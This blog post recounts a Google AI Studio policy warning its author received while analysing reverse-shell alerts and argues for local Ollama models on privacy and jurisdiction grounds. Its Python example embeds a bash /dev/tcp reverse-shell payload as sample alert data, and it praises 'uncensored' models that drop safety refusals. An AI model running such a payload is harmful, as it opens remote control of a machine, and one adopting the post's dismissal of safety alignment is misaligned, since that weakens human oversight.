The Day Google Banned My Threat Hunting

Ever received a warning from Google for analyzing malware? I have. It is proof that cloud AI watches every move.

Artificial Intelligence has undeniably revolutionized the daily operations of Security Operations Centers (SOCs) and threat hunters. The ability to parse logs, de-obfuscate code, and generate detection rules in seconds is a game-changer. However, the initial euphoria surrounding tools like ChatGPT or Gemini often blinds professionals to the significant risks associated with processing sensitive security data on third-party cloud platforms. It is becoming increasingly clear that for true operational security, the intelligence must reside where the data is - on your own hardware, not in the cloud. And sometimes, the cloud strikes back.

The Watchful Eye of the Provider

It is often assumed that interactions with Large Language Models (LLMs) are ephemeral, or at least private. We tend to think of the API prompt as a secure tunnel between our question and the answer. My own recent experience paints a very different picture.



During a recent automated threat analysis session - specifically designed to analyze "ET EXPLOIT Reverse Shell" signatures and various IPS payloads - the following notification arrived from Google AI Studio:

The email states clearly: "We recently detected that your Google AI Studio project ... is using the Gemini API in a manner that violates Google's Generative AI Prohibited Use Policy."

This serves as a stark wake-up call. Cloud providers do not merely process queries; they actively monitor, analyze, and flag them. For a security analyst, "malicious" strings are daily business - they are the artifacts of defense, not offense. Yet, to a cloud provider's safety filter, there is often no distinction between a threat hunter analyzing a reverse shell to write a YARA rule and a script kiddie trying to build one.

If a provider can warn a user about their queries, they can certainly read, store, and potentially act upon them in ways that might compromise a security investigation. You are not just a customer; in their eyes, you might be a suspect.

Leaking the Blueprint

Beyond the risk of account suspension, a far more critical issue involves the voluntary disclosure of weaknesses. When a security professional asks a public AI, "How do I mitigate vulnerability CVE-202X-XXXX in a legacy architecture running on Server Y with config Z?", they are essentially handing over a blueprint of their organization's security posture.

For governments and large industrial enterprises, this constitutes a potential leak of trade secrets and critical infrastructure vulnerabilities. The data fed into these public models may be used to train future iterations, potentially embedding sensitive configuration data or proprietary code snippets into the model's public knowledge base. In a highly competitive or hostile environment, revealing what you are defending against is almost as dangerous as revealing how you are defending it.

The Long Arm of Foreign Jurisdiction

The argument that "our data stays in Europe" is frequently cited as a defense for using major cloud providers, but legal realities often contradict this technical segmentation. As highlighted in a recent analysis regarding US authorities' access to European cloud data, the physical location of a server is secondary to the legal domicile of the provider.

US laws, such as the CLOUD Act and FISA Section 702, grant US authorities far-reaching access to data held by US companies, regardless of where that data is stored globally. For a European company or government entity, this means that sensitive forensic data uploaded to a US-based cloud AI could theoretically be accessed by foreign intelligence services without the user's consent or knowledge. True data sovereignty is impossible if the processing logic is owned by a foreign entity subject to extraterritorial laws.

The Uncensored, Self-Hosted Alternative

The solution to these privacy, secrecy, and censorship issues is not to abandon AI, but to repatriate it. As explored in previous analyses of AI-powered Threat Hunting with Wazuh and Advanced Incident Analysis, the power of LLMs can be harnessed locally.

By hosting models locally - using tools like Ollama with models such as gemma3 or qwen3-coder - organizations gain two massive advantages:

- Total Privacy: No data leaves the premises. Queries about sensitive vulnerabilities or proprietary code remain air-gapped or within the internal network.

- Uncensored Analysis: Commercial models are heavily aligned to refuse "harmful" requests. A security analyst asking a cloud AI to de-obfuscate malware code is often refused or, as the Google warning above shows, flagged as a policy violation. Self-hosted "uncensored" models, as detailed in the guide to running uncensored AI self-hosted, will execute these tasks without moralizing, providing the raw technical assistance required for deep forensic work.
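To make the self-hosted option more concrete, here is a minimal Python sketch of sending an IPS alert to a local model instead of a cloud API. It assumes a stock Ollama install listening on its default port 11434, an already pulled `qwen3-coder` model, and Ollama's `/api/generate` endpoint with streaming disabled. The alert field names (`signature`, `payload`), the helper names, and the sample reverse-shell payload (which uses a documentation IP address) are hypothetical and only serve as illustration. The request never leaves localhost.

```python
import json
import urllib.request

# Default endpoint of a local Ollama server (assumption: stock install, default port).
OLLAMA_URL = "http://localhost:11434/api/generate"

# Hypothetical alert record; field names are illustrative, adapt them to your IDS/SIEM output.
SAMPLE_ALERT = {
    "signature": "ET EXPLOIT Reverse Shell",
    "payload": "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",  # 203.0.113.0/24 is a documentation range
}


def build_request(alert: dict, model: str = "qwen3-coder") -> dict:
    """Build a non-streaming /api/generate payload for a single IPS alert."""
    prompt = (
        "You are assisting a SOC analyst. Explain what the following IPS alert "
        "indicates and suggest an idea for a YARA or Suricata detection rule.\n\n"
        f"Signature: {alert['signature']}\n"
        f"Payload: {alert['payload']}"
    )
    # "stream": False asks Ollama to return one JSON object instead of a stream of chunks.
    return {"model": model, "prompt": prompt, "stream": False}


def ask_local_model(payload: dict, url: str = OLLAMA_URL, timeout: float = 120.0) -> str:
    """POST the payload to the local Ollama server and return the generated text."""
    data = json.dumps(payload).encode("utf-8")
    req = urllib.request.Request(
        url, data=data, headers={"Content-Type": "application/json"}, method="POST"
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = json.load(resp)
    # For non-streaming requests, the full completion is in the "response" field.
    return body["response"]


# Usage (requires a running Ollama server):
#   print(ask_local_model(build_request(SAMPLE_ALERT)))
```

Switching models is a matter of passing `model="gemma3"` to `build_request`. The sketch sticks to the standard library's `urllib` so it can run on a locked-down analysis host without installing extra packages.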

Even in a short-term test environment that ran for just three weeks and used Gemini as the AI provider, I managed to trigger Google's alarms and restrictions. That alone is enough for me to rule out using their services in the future - much like Danish public authorities, which have begun moving away from Microsoft.

Conclusion

The convenience of cloud-based AI comes with a price tag paid in privacy and control. The warning email from Google is proof that Big Tech is watching your prompts. For security professionals, the risk of leaking trade secrets, exposing vulnerabilities, or triggering provider bans is simply too high. The future of secure threat analysis lies in powerful, local, and uncensored models that serve the defender without reporting back to a mothership.

[UPDATE]: 15 days after being banned by Google, my account was finally reactivated.